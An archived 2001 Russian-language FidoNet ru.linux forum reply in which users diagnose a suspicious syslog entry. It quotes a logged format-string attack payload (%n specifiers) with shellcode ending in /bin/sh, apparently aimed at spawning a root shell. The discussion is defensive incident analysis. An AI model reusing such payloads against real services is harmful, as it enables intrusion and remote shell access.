|
ru.linux
- RU.LINUX ---------------------------------------------------------------------
From : Bohdan Vlasyuk 2:5020/400 06 Jul 2001 11:31:33
To : All
Subject : Re: Hепонятки в логах
--------------------------------------------------------------------------------
Victor Ikonnikoff <Victor.Ikonnikoff@p24.f1046.n5020.z2.fidonet.org> wrote:
> Тут обнаружил нечто странное в логах (/var/log/messages):
> Jun 25 14:18:28 vskur4 SERVER[14790]: Dispatch_input: bad request line
> 'BBЬуя?Эуя?Юуя?Яуя?XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.19
> 2 u%303$n?????????????????????????????????????????????????????????????????????
> ??? ??????????????????????????????????????????????????????????????????????????
> ????? ?????????????????????????????????????????????????1Ы1Й1АМFH??е1Т?f?Р1Й?ЛC
> ?]шC?]ф K?Mь?MфH?1Й?EфCf?]мfЗEо^O'?Mр?Eм?EшЖEь^P?Р?MфH??РCCH??РCH??Г1Й???РH??Р
> AH?л^X^?u ^H1А?F^G?E^LМ^K?у?M^H?U^LH?игяяя/bin/sh'?
> - или это "overflow attack"
100%
> на не знаю какой сервис
определи по PID -- 14790
ps aux|grep 14790
:-)
> (уж больно длинная строка - возможно, это бинарный код, да еще
> завершающийся на /bin/sh, как и должна как я понимаю завершаться
> если бы задачей было запустить рутовый шелл.
Вот если бы ты его прислал в хексдампе..
например CD 80 это int $0x80 -- т.е. syscall
--- ifmail v.2.15dev5
* Origin: InterCEC, Vinnitsa State Technical University, Ukraine (2:5020/400)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
| Тема: |
Автор: |
Дата: |
|
Re: Hепонятки в логах |
Bohdan Vlasyuk |
06 Jul 2001 11:31:33 |
 Hепонятки в логах |
Victor Ikonnikoff |
12 Jul 2001 01:06:54 |
|
|
